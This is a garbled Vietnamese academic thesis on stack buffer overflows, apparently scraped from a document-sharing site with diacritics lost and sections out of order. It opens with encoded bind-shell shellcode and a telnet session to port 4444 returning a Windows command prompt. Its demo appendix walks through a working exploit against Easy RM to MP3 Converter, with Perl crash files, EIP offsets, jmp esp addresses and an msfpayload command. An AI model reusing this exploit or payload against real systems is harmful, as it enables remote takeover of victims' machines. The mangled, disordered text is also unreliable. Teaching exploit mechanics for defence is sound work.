\x56\x43\x5a\x44\x50\x50\x51\x51\x45\x4b\x4f\x4e\x30\x43 .
\x58\x49\x34\x4e\x4d\x46\x4e\x4b\x59\x50\x57\x4b\x4f\x4e .
\x36\x50\x53\x46\x35\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x50 .
\x49\x4d\x56\x50\x49\x51\x47\x4b\x4f\x48\x56\x50\x50\x50 .
\x54\x50\x54\x46\x35\x4b\x4f\x48\x50\x4a\x33\x45\x38\x4a .
\x47\x44\x39\x48\x46\x43\x49\x50\x57\x4b\x4f\x48\x56\x50 .
\x55\x4b\x4f\x48\x50\x42\x46\x42\x4a\x42\x44\x45\x36\x45 .
\x38\x45\x33\x42\x4d\x4d\x59\x4b\x55\x42\x4a\x46\x30\x50 .
\x59\x47\x59\x48\x4c\x4b\x39\x4a\x47\x43\x5a\x50\x44\x4b .
\x39\x4b\x52\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x47 .
\x32\x46\x4d\x4b\x4e\x51\x52\x46\x4c\x4d\x43\x4c\x4d\x42 .
\x5a\x50\x38\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x42\x52\x4b .
\x4e\x4e\x53\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x49 .
\x46\x51\x4b\x46\x37\x46\x32\x50\x51\x50\x51\x46\x31\x42 .
\x4a\x45\x51\x46\x31\x46\x31\x51\x45\x50\x51\x4b\x4f\x48 .
\x50\x43\x58\x4e\x4d\x4e\x39\x45\x55\x48\x4e\x51\x43\x4b .
\x4f\x49\x46\x43\x5a\x4b\x4f\x4b\x4f\x47\x47\x4b\x4f\x48 .
\x50\x4c\x4b\x46\x37\x4b\x4c\x4c\x43\x49\x54\x45\x34\x4b .
\x4f\x4e\x36\x50\x52\x4b\x4f\x48\x50\x43\x58\x4c\x30\x4c .
\x4a\x44\x44\x51\x4f\x46\x33\x4b\x4f\x48\x56\x4b\x4f\x48 .
\x50\x41\x41;
open($FILE,>$file);
close($FILE);
To file m3u v m, Easy RM to MP3s b treo:

Gi ta ch vic Telnet n port 4444
root@bt:/# telnet 192.168.0.197 4444
Trying 192.168.0.197
Connected to 192.168.0.197.
Escape character is ^].
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\Easy RM to MP3 Converter>
Kt lun chng III

Chng III trnh by cc cch tm li bo mt phn mm ca lp trnh vin, ngi kim th, v
quan trng nht l cch thc tm li ca hacker. Chng ny ch yu trnh by cch m hacker tm
ra li trn b m trn stack. Vic xc nh xem mt phn mm c b li hay khng l iu rt quan
trng
Trong chng ny chng ta cng i tm hiu cc bc khai thc thnh cng li trn b m trn
stack. Vic quan trng nht khai thc thnh cng mt li trn b m trn stack l vic lm th
no nhy ti shellcode. iu ny c trnh by mt cch chi tit trong chng ny. nhy ti
shellcode ta c rt nhiu cch, v ty vo trng hp c th m ta s dng cch tt nht thc
hin.
XUT QU TRNH PHT TRIN

PHN MM AN TON
T vic nghin cu v l hng bo mt phn mm, chng ta nhn thy vic m bo cho phn mm
c an ton l v cng quan trng. m bo cho mt sn phm phn mm c an ton th
nhng iu sau y l khng th thiu:
m bo phn mm an ton ngay t khu thit k. Nu m bo an ton ngay t khu thit
k s trnh c nhng ri ro rt ln v li bo mt phn mm trong qu trnh trin khai. Phn mm

trong qu trnh pht trin c m bo an ton t bn thit k. iu ny gip vic m bo an
ton cho sn phm phn mm tt hn.
Tun theo qui trnh pht trin phn mm nghim ngt, y ng bc. iu ny s trnh
sai phm m ngi pht trin c th gp phi khi thit k.
S dng mu thit k an ton. y l cch m cc nh pht trin lun lun chn la. Cc
mu thit k an ton c kim nghim v nh gi, khi s dng chng s trnh nguy c pht sinh
li bo mt phn mm.
C i ng lp trnh vin nhiu kinh nghim. Mt yu t then cht l phi c i ng lp trnh
vin c kinh nghim trong lnh vc pht trin phn mm. H l nhng ngi trc tip vit ra cc sn
phm phn mm. Do h ng vai tr quan trng trong vic m bo an ton cho sn phm phn
mm.
Thc hin kim th phn mm. y l khu bt buc v khng th thiu c nu mun sn
phm l an ton.
Thu Hacker tn cng th nghim phn mm tm kim li. Xu hng ca cc nh pht
trin hin nay l vic thu cc hacker gii th tn cng sn phm ca ho. T h c th pht hin
c nhng li m h khng ng ti.
KT LUN V NH HNG PHT

TRIN
Khai thc li bo mt phn mm l mt cng vic tng i kh khn v phc tp.Vic nm vng v
nghin cu k tt c cc vn i hi nhiu thi gian v cng sc. Qua mt thi gian nghin cu v
tm hiu, ti ca em hon thnh. Cc ni dung chnh m ti thc hin c l:
1) Tm hiu tng quan v phn mm.
2) Tm hiu v cc qui trnh pht trin mt sn phm phn mm.
3) Tm hiu v li phn mm, li bo mt phn mm v mt s li bo mt phn mm ph bin.
4) Tm hiu cc cch m lp trnh vin, ngi kim th v hacker pht hin ra li bo mt phn mm.
5) Phn tch chi tit li trn b m trn stack, cch thc tm ra li ny v cc bc khai thc thnh
cng li ny.
6) Tm hiu cc cch m hacker s dng nhy n shellcode.
7) Khai thc th nghim li trn b m trn stack thnh cng
Hng pht trin ca ti l m rng nghin cu li trn b m trn stack vi trng hp kh hn
l khng c on b nh no lu tr shellcode cn phi chia nh shellcode lu trn cc phn
on b nh nh. M rng nghin cu k thut nhy ti shellcode SHE. M rng nghin cu cc li
khc nh li trn b m trn heap, li double free, li use after free cng nh cch tm v khai thc
cc li ny.
TI LIU THAM KHO

[1]. Stack Based Overflows Corelan Team
https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
[2]. Stack Based Overflows jumping to shellcode Corelan Team
https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basictutorial-part-2/
[3]. Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness (2007)
Gray Hat Hacking: The Ethical Hackers Handbook Second Edition
[4]. Greg Hoglund and Gary McGraw (2004)
Exploiting Software: How to Break Code
[5]. Gary McGraw (2006)
Software Security: Building Security In
[6]. Hc vin K thut Mt m (2006)
Gio trnh Cng ngh phn mm

[7]. Buffer Overflow
http://www.ksyash.com/2011/01/buffer-overflow-2/
[8]. Double Free
https://www.owasp.org/index.php/Double_Free
[9]. Avoiding Buffer Overflows And Underflows
https://developer.apple.com/library/mac/#documentation/security/conceptual/SecureCodingGuide/Arti
cles/BufferOverflows.html
[10]. http://samate.nist.gov/SRD/view.php
PH LC
1.
1.
PH LC 1: CHNG TRNH KHI NP TRONG B NH
Khi nhng tin trnh c np n b nh, chng chia thnh 6

phn on nh sau:
1.1.
Phn on .text
Phn on ny tng ng l phn ca file thc thi nh phn. N cha cc ch th lnh (m my)
thc hin cc tc v ca chng trnh. Phn on ny c nh du l ch c v s gy ra li nu
nh ghi trn phn on ny. Kch thc l c nh ti lc thc thi khi tin trnh ln u tin c np.
1.2.
Phn on .data
L phn on c s dng lu tr cc bin ton cc v c khi to gi tr ban u nh l : int a=0

; Kch thc ny cng c nh ti lc thc thi chng trnh.
1.3.
Phn on .bss
Below stack section (.bss) l c s dng lu tr cc bin ton cc nhng khng c khi to gi
tr ban u nh l : int a;
Kch thc ca phn on ny cng c nh lc thc thi chng trnh.
1.4.
Phn on Heap
Phn on ny c s dng cp pht cc bin ng v pht trin t vng a ch thp n vng

a ch cao trong b nh. Trong ngn ng C th vic cp pht v gii phng c thc hin qua hai
hm malloc() v free(). V d : int i = malloc(sizeof (int));
1.5.
Phn on Stack
Phn on stack c tc dng gi nhng li gi hm trong th tc quy v pht trin theo a ch

vng nh cao n a ch vng nh thp trn hu ht cc h thng.
1.6.
Phn on bin mi trng v i s
Phn on ny lu tr mt bn sao chp cc bin cp h thng m c th c yu cu bi tin

trnh trung qu trnh thc thi. Phn on ny c kh nng ghi c.
1.
2.
PH LC 2: THE PROCESS MEMORY
Mi ng dng Windows s dng cc phn ca b nh. Trong gm 3 thnh phn chnh l:
Code segment: m lnh hng dn b x l thc thi. (EIP tr n m lnh s c thc thi tip
theo)
Data segment: bin varible, dynamic buffer
Stack segment: c s dng truyn data ( d liu) tham s ( agrument) vo trong hm,
v c s dng nh l mt ni lu tr bin. Stack bt u ( y stack) ti v tr kt thc ( very end)

ca trang b nh o ( virtual memory) v gim dn. Lnh PUSH thm vo nh stack, POP th ly n
ra ( 4bytes) v chuyn vo thanh ghi.
Nu mun truy cp stack trc tip, c th s dng thanh ghi ESP (Stack Pointer). Thanh ghi ny lun
tr vo nh stack a ch thp nht ca stack.
Sau khi PUSH, ESP s tr n a ch thp hn ( a ch s c gim bng size ca d liu c push
vo stack thng l 4 bytes vi a ch / thanh ghi) Vic gim a ch thng c thc hin trc
khi t d liu vo stack ( ty thuc vo qu trnh thc hin nu ESP ch vo v tr tip theo trong
stack, vic gim s tin hnh sau khi t d liu vo stack)
Sau khi POP, ESP tr n a ch cao hn ( a ch c tng, thng l 4bytes). Vic tng a ch xy
ra khi sau khi g b thnh phn ra khi stack.
Khi mt hm / chng trnh con bt u, mt frame stack c to ra. Frame ny s lu cc thng s
ca th tc trc v c s dng chuyn tham s cho chng trnh con. V tr hin ti ca con
tr c th truy cp qua ESP stack pointer. C s bt u ca hm hin ti c cha trong thanh
ghi c s base pointer (EBP) hoc frame pointer.
2.1.
Cc thanh ghi ph bin (Intel, x86)

EAX accumulator: c s dng cho vic tnh ton, lu tr d liu ( trong function call chng
hn). S dng trong cc ton t c bn nh add, subtract, compare.
EBX base: ( khng c bt k iu g cn lm vi thanh ghi c s) khng c mc ch chnh
xc v c s dng lu d liu.
ECX counter: c s dng lp ECX gim dn.
EDX data : thanh ghi m rng ca EAX. Cho php cc tnh ton phc tp hn ( multiply
divde) bng cch cho php m rng lu tr d liu to iu kin cho tnh ton ( nh lu thng s
vo EAX, phn d vo EDX chng hn)
ESP : stack pointer : tr n nh stack.
EBP : base pointer : di so vi nh stack.
ESI source index : lu gi v tr ca input data.
EDI destination index : ch n v tr kt qu ca ton t c lu tr.
EIP : instruction pointer : tr n lnh k tip c thc hin
2.2.
Process Memory
Khi ng dng bt u trong mi trng Win32, tin trnh c to v b nh o (virtual memory)

c gn. Vi tin trnh 32 bit, a ch bt u t 000000000 n 0xFFFFFFFF. Trong t
000000000 n 0x7FFFFFFF c gn cho user-land, cn t 080000000 n 0xFFFFFFFF c
gn cho kernel-land. Windows s dng flat memory model iu c ngha CPU c th trc tip /
tun t / tuyn tnh a ch tt c v tr a ch c sn m khng cn phi s dng phn on phn
trang.
B nh Kernel land ch c truy cp bi OS
Khi tin trnh c to , PEB (Process Execution Block) v TEB (Thread Environment Block) cng c
to.
PEB bao gm tt c user land parameters ( tham s ca user land) gn vi tin trnh hin ti:
V tr ca main excute
Tr n loader data ( s dng hin th tt c dll / module c load trong tin trnh)
Tr n thng tin v heap
TEB m t trng thi ca tin trnh, bao gm:
V tr ca PEB trong b nh
V tr ca stack trong tin trnh m n s hu
Tr n entry u tin ca SEH chain
Mi lung (thread) bn trong tin trnh (process) c mt TEB.
Hnh ph lc: S b nh trong tin trnh ca Win32
Phn on text ( text segment) trong program image l read-only, v ch bao gm application code.
iu ny hn ch sa i application code. Data segment c s dng lu tr bin ton cc
(global) v bin tnh (static). Data segment c s dng khi to global variables, strings,
constants.
Data segment c kh nng ghi v c size c nh. Heap segment c s dng cho cc phn cn li
ca program variables. N c th pht trin ln hn hoc nh hn thit k.Tt c b nh trong heap
c qun l bi thut ton cp pht v thut ton thu hi. Mt vng nh c dnh ring bi thut
ton. Heap s pht trin a ch ln cao hn.
Trong dll, cc m, u vo (danh sch cc hm c s dng bi dll hoc dll khc v ng dng), u
ra l mt phn ca .text segment.
1.
3.
PH LC 3
C,C++,Perl : y l cc ngn ng lp trnh bc cao.
Readme : Thng l tn mt tp vn bn nm trong a ci t ca cc chng trnh ng dng,
cha cc thng tin pht cht, khng c trong cc bn thuyt minh s dng ca chng trnh . Tn
gi in hnh ca tp.
instance methods : Phng thc hng i tng, s dng trong ngn ng lp trnh hng i
tng.
thread: lung (lung b x l)
Disassembly : L mt chng trnh my tnh c nhim v dch t ngn ng my (machine
language) sang ngn ng lp trnh bc thp assembly.
Debugger : L mt chng trnh my tnh c s dng kim tra v pht hin li ca cc
chng trnh my tnh khc.
NOP (No Operation Performed) : gp lnh ny chng trnh s chy qua m khng thc hin
bt k hnh ng no.
Opcode (operation code): l thut ng dng ch cc loi m c vit di dng cc ngn
ng my, n c tc dng hng dn cho my cc thao tc cn phi thc hin. Cu trc opcode ty
thuc vo tng loi my v ngn ng m b x l m my c th nhn bit.
Payload : L phn d liu chnh. y Payload l phn shellcode m metasploit cung cp.
RET: y l mt lnh ca ngn ng lp trnh assembly, n c tc dng cng 4 bytes vo ESP.
Devcpp : y l mt chng trnh my tnh h tr vic vit v bin dch ngn ng lp trnh
C/C++.
1.
4.
PH LC 4: BNG OPCODE CA CC LNH NHY V C
Code
Mnemonic
Description
77 cb
JA rel8
Jump short if above (CF=0 and ZF=0)
73 cb
JAE rel8
Jump short if above or equal (CF=0)
72 cb
JB rel8
Jump short if below (CF=1)
76 cb
JBE rel8
Jump short if below or equal (CF=1 or ZF=1)
72 cb
JC rel8
Jump short if carry (CF=1)
E3 cb
JCXZ rel8
Jump short if CX register is 0
E3 cb
JECXZ rel8
Jump short if ECX register is 0
74 cb
JE rel8
Jump short if equal (ZF=1)
7F cb
JG rel8
Jump short if greater (ZF=0 and SF=OF)
7D cb
JGE rel8
Jump short if greater or equal (SF=OF)
7C cb
JL rel8
Jump short if less (SF<>OF)
7E cb
JLE rel8
Jump short if less or equal (ZF=1 or SF<>OF)
76 cb
JNA rel8
Jump short if not above (CF=1 or ZF=1)
72 cb
JNAE rel8
Jump short if not above or equal (CF=1)
73 cb
JNB rel8
Jump short if not below (CF=0)
77 cb
JNBE rel8
Jump short if not below or equal (CF=0 and ZF=0)
73 cb
JNC rel8
Jump short if not carry (CF=0)
75 cb
JNE rel8
Jump short if not equal (ZF=0)
7E cb
JNG rel8
Jump short if not greater (ZF=1 or SF<>OF)
7C cb
JNGE rel8
Jump short if not greater or equal (SF<>OF)
7D cb
JNL rel8
Jump short if not less (SF=OF)
7F cb
JNLE rel8
Jump short if not less or equal (ZF=0 and SF=OF)
71 cb
JNO rel8
Jump short if not overflow (OF=0)
7B cb
JNP rel8
Jump short if not parity (PF=0)
79 cb
JNS rel8
Jump short if not sign (SF=0)
75 cb
JNZ rel8
Jump short if not zero (ZF=0)
70 cb
JO rel8
Jump short if overflow (OF=1)
7A cb
JP rel8
Jump short if parity (PF=1)
7A cb
JPE rel8
Jump short if parity even (PF=1)
7B cb
JPO rel8
Jump short if parity odd (PF=0)
78 cb
JS rel8
Jump short if sign (SF=1)
74 cb
JZ rel8
Jump short if zero (ZF = 1)
0F 87 cw/cd
JA rel16/32
Jump near if above (CF=0 and ZF=0)
0F 83 cw/cd
JAE rel16/32
Jump near if above or equal (CF=0)
0F 82 cw/cd
JB rel16/32
Jump near if below (CF=1)
0F 86 cw/cd
JBE rel16/32
Jump near if below or equal (CF=1 or ZF=1)
0F 82 cw/cd
JC rel16/32
Jump near if carry (CF=1)
0F 84 cw/cd
JE rel16/32
Jump near if equal (ZF=1)
0F 84 cw/cd
JZ rel16/32
Jump near if 0 (ZF=1)
0F 8F cw/cd
JG rel16/32
Jump near if greater (ZF=0 and SF=OF)
0F 8D cw/cd
JGE rel16/32
Jump near if greater or equal (SF=OF)
0F 8C cw/cd
JL rel16/32
Jump near if less (SF<>OF)
0F 8E cw/cd
JLE rel16/32
Jump near if less or equal (ZF=1 or SF<>OF)
0F 86 cw/cd
JNA rel16/32
Jump near if not above (CF=1 or ZF=1)
0F 82 cw/cd
JNAE rel16/32
Jump near if not above or equal (CF=1)
0F 83 cw/cd
JNB rel16/32
Jump near if not below (CF=0)
0F 87 cw/cd
JNBE rel16/32
Jump near if not below or equal (CF=0 and ZF=0)
0F 83 cw/cd
JNC rel16/32
Jump near if not carry (CF=0)
0F 85 cw/cd
JNE rel16/32
Jump near if not equal (ZF=0)
0F 8E cw/cd
JNG rel16/32
Jump near if not greater (ZF=1 or SF<>OF)
0F 8C cw/cd
JNGE rel16/32
Jump near if not greater or equal (SF<>OF)
0F 8D cw/cd
JNL rel16/32
Jump near if not less (SF=OF)
0F 8F cw/cd
JNLE rel16/32
Jump near if not less or equal (ZF=0 and SF=OF)
0F 81 cw/cd
JNO rel16/32
Jump near if not overflow (OF=0)
0F 8B cw/cd
JNP rel16/32
Jump near if not parity (PF=0)
0F 89 cw/cd
JNS rel16/32
Jump near if not sign (SF=0)
0F 85 cw/cd
JNZ rel16/32
Jump near if not zero (ZF=0)
0F 80 cw/cd
JO rel16/32
Jump near if overflow (OF=1)
0F 8A cw/cd
JP rel16/32
Jump near if parity (PF=1)
0F 8A cw/cd
JPE rel16/32
Jump near if parity even (PF=1)
0F 8B cw/cd
JPO rel16/32
Jump near if parity odd (PF=0)
0F 88 cw/cd
JS rel16/32
Jump near if sign (SF=1)
0F 84 cw/cd
JZ rel16/32
Jump near if 0 (ZF=1)
1.
5.
PH LC 5 : CC BC THC HIN DEMO
Bc 1: Download Easy RM to MP3 Converter ti

http://www.rm-to-mp3.net/EasyRMtoMP3Converter.exe
Bc 2: ci t Easy RM to MP3 Converter
Bc 3: Tm li
Vit code perl sau, save thnh crash.pl
my $file= crash.m3u;
open($FILE,>$file);
print $FILE $junk;
close($FILE);
Th vi 10000 A
x 10000
Th vi 20000 A
x 20000
Th vi 30000 A
x 30000
Bc 4: Mc vo debugger bng cch click vo debug

Bc 5: Xc nh kch thc b m ghi chnh xc vo EIP
Bng cch chia i khong 20000-30000. t 25000A v 5000B
my $file= "crash25000.m3u";
my $junk = "A" x 25000;
my $junk2 = "B" x 5000;
open($FILE,">$file");
close($FILE);
print "m3u File Created successfully\n";
EIP=42424242. Kt lun EIP nm khong 25000 30000
Xch nh chnh xc EIP bng cch s dng 2 tool pattern_create.rb vpattern_offset.rb trong th mc
tool trong metasploit framework3
Bc 6: bt bactrack, vo th mc /pentest/exploits/framework/tools
./pattern_create.rb 5000
c kt qu a vo $junk2 bc sau
Bc 7: Thay i code perl
my $file= "crash25000.m3u";
my $junk = "A" x 25000;
my $junk2 = dua 5000 ky tu vua tao vao day
close($FILE);
Bc 8: s dng ./pattern_offset.rb 0x356A4234 5000
1064 -> EIP vi tr 26065
Bc 9: thay i code perl xc nh chnh xc EIP
my $file= "eipcrash.m3u";
my $junk= "A" x 26064;
my $eip = "BBBB";
my $espdata = "C" x 1000;
print $FILE $junk.$eip.$espdata;
close($FILE);
Bc 10: Tm khng gian b nh t shellcode
S dng code perl vi shellcode c m phng nh di di 144 k t (c th nhiu hoc t hn)
my $file= "test1.m3u";
my $junk= "A" x 26064;

my $eip = "BBBB";
my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK" .
"5ABCDEFGHIJK6ABCDEFGHIJK" .
"9ABCDEFGHIJKAABCDEFGHIJK".
"BABCDEFGHIJKCABCDEFGHIJK";
close($FILE);
Nhn ln thanh ghi ESP c ni dung DEFGHIK2AB. . Kt lun ESP cch EIP 4bytes. ESP bt u ti
k t th 5
Bc 11: Thm 4 k t trc shellcode
my $junk= "A" x 26064;
my $eip = "BBBB";
my $preshellcode = "XXXX";
my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK" .
"9ABCDEFGHIJKAABCDEFGHIJK".
"BABCDEFGHIJKCABCDEFGHIJK";
print $FILE $junk.$eip.$preshellcode.$shellcode;
close($FILE);
Gi ta iu khin EIP.
C mt khng gian b nh 144bytes ghi shellcode, cch EIP 4bytes
Thanh ghi ESP tr ti u shellcode ti a ch 0x000ff730
Bc 12: Ghi a ch EIP l a ch u tin ca shellcode v shellcode la 25 NOP + break + 25 NOP
my $junk= "A" x 26064;
my $eip = pack('V',0x000ff730);
my $shellcode = "\x90" x 25;
$shellcode = $shellcode."\xcc";
$shellcode = $shellcode."\x90" x 25;
close($FILE);

Chng ta khng chy c shellcode do trong a ch cha nullbytes (\x00). y l cch gi trc tip
a ch bt u shellcode. Nhng y khng phi l mt cch tt. Chng ta s th vi cch nhy ti
shellcode tt hn.
Bc 13: Trc tin, chng ta cn tm nhng opcode cho jmp esp
m Easy RM to MP3, ri m ollydbg, v hook (mc) ollydbg ti Easy RM to MP3
search all command. Nhp jmp esp
Nhn vo ct opcode ta thy opcode l FFE4 ti 7C941EED
Bc 14: Tm opcode trong nhng dll c load
Chon view executable modules
Chn cc module n ctrl F tm jmp esp cho n khi tm ra
Ti module C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll Thy ti a ch
01A4F23A c lnh jmp esp c opcode FFE4
Nu dng module SHELL32.dll th opcode c a ch l 7CA58265
Vit li code perl
my $junk= "A" x 26064;
my $eip = pack('V',0x01a4f23a);
my $shellcode = "\x90" x 25;
$shellcode = $shellcode."\xcc;
$shellcode = $shellcode."\x90" x 25;
close($FILE);
Chy thnh cng. Tuy nhin nu a ch ghi vo eip m cha null bytes th ta li phi s dng cch
khc nhy ti shellcode
Bc 15: Ly shellcode hon thin exploit
M backtrack v g cc lnh sau
Cd ~
msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=4444 R | msfencode -e x86/alpha_upper
-t perl
[1] Ph lc 3 Trang 89

tràn bộ đệm

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

tràn bộ đệm

Uploaded by

Copyright:

Available Formats

MC LC

DANH MC CC T VIT TT.. 3

GII THIU CHUNG.. 9

Khi nim phn mm.. 9

Qui trnh pht trin phn mm.. 9

CC THNH PHN CA PHN MM 10

Cc ti liu ca qu trnh pht trin PM 10

Cc thnh phn to nn mt sn phm phn mm.. 10

M HNH PHT TRIN PHN MM 11

M hnh tin ha. 16

M hnh lp v tng dn. 17

M hnh pht trin nhanh. 19

GII THIU CHUNG.. 23

nh ngha li phn mm.. 23

nh ngha li bo mt phn mm.. 23

LI TRN B M TRN STACK.. 23

Li trn Stack (Stack Based BufferOverflow). 26

LI TRN B M TRN HEAP. 34

Kt lun chng II. 36

Vai tr l lp trnh vin. 37

Vai tr l ngi kim th. 39

Mc chng trnh ti debugger. 42

xc nh chnh xc EIP trong b m.. 44

Tm khng gian b nh lu tr cc shellcode. 47

Nhy n shellcode mt cch tin cy. 52

Ly shellcode hon thin exploit 56

CC K THUT NHY TI SHELLCODE.. 57

jump (hoc call). 57

jmp [reg + offset]. 66

Dealing with small buffers. 68

SEH (Structured Exception Handling). 74

Kt lun chng III. 81

TI LIU THAM KHO.. 84

PH LC 1: CHNG TRNH KHI NP TRONG B NH.. 85

PH LC 2: THE PROCESS MEMORY.. 86

PH LC 4: BNG OPCODE CA CC LNH NHY V C.. 90

PH LC 5 : CC BC THC HIN DEMO.. 92

Software Development/Engineering Process

Qui trnh pht trin/xy dng phn mm

Software requirement specification

Graphical user interface

Giao din ha ngi dng

Rational Unified Process

Qui trnh thng nht hp l

Rapid Application Development

M hnh pht trin nhanh

Last In First Out

Extended Stack Pointer

Con tr stack m rng

Extended Base Pointer

Extended Instruction Pointer

Con tr lnh m rng

Khng thc hin hnh ng no

Dynamic Link Library

Central Processing Unit

Structured Exception Handling

2 M hnh pht trin

Stack sau khi thc hin lnh MOV

Stack sau khi thc hin hm CALL

ESP s gim 4bytes

ESP li gim 4bytes ln na

ESP s gim mt s bytes c khng gian cho bin

Stack sau khi thc hin lnh MOV

Strcpy() s ghi EBP c lu v c EIP